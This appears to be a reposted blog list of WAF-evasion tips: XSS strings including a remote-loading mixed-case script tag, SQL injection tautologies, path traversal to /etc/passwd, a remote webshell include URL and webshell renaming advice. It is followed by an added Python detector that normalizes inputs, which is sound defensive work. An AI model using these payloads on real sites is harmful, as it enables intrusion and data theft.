1 stop using alert('xss') , use prompt('xss') ;
2 don't do <script> , do <ScRIPT x src=//0x.lv? ;
3 stop using ' or 1=1-- , use ' or 2=2-- ;
4 stop using UNION SELECT , use UNION ALL SELECT ;
5 don't do /etc/passwd , do /foo/../etc/bar/../passwd ;
6 don't use http://xxx.com/r57.txt , use https://xxx.com/lol.txt ;
7 don't call webshell x99.php/shell.aspx or cmd.jsp , call it rofl.php ;
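
Seen from the filter's side, items 1 to 5 each replace one literal signature with an equivalent spelling. The Python below is an added example, not part of the original post: it matches on normalized behaviour instead of exact strings. The function name `classify`, the rule names and the path list are hypothetical.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical rules: each one matches a behaviour, not one literal spelling.
TAUTOLOGY = re.compile(r"'\s*or\s+(\d+)\s*=\s*(\d+)", re.I)   # ' or N=N
UNION = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I)
SCRIPT_TAG = re.compile(r"<script\b", re.I)                    # any letter case
DIALOG_CALL = re.compile(r"\b(?:alert|prompt|confirm)\s*\(", re.I)
SENSITIVE_PATHS = {"/etc/passwd", "/etc/shadow"}               # constructed list


def classify(value):
    """Return the set of rule names that a request value triggers."""
    text = unquote(value)  # undo one layer of URL encoding before matching
    hits = set()
    m = TAUTOLOGY.search(text)
    # Compare the two numbers instead of looking for the literal "1=1".
    if m and int(m.group(1)) == int(m.group(2)):
        hits.add("sqli-tautology")
    if UNION.search(text):
        hits.add("sqli-union")
    if SCRIPT_TAG.search(text):
        hits.add("xss-script-tag")
    if DIALOG_CALL.search(text):
        hits.add("xss-dialog-call")
    # Resolve "." and ".." segments so the comparison sees the final path.
    resolved = posixpath.normpath("/" + text.lstrip("/"))
    if resolved in SENSITIVE_PATHS:
        hits.add("path-sensitive-file")
    return hits


if __name__ == "__main__":
    # Constructed samples taken from the list items above.
    for sample in ["prompt('xss');", "<ScRIPT x src=//0x.lv? ",
                   "' or 2=2-- ", "UNION ALL SELECT",
                   "/foo/../etc/bar/../passwd"]:
        print(repr(sample), sorted(classify(sample)))
```
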
This article is reposted from hackfreer's 51CTO blog. Original link: http://blog.51cto.com/pnig0s1992/489137. To repost it, please contact the original author yourself.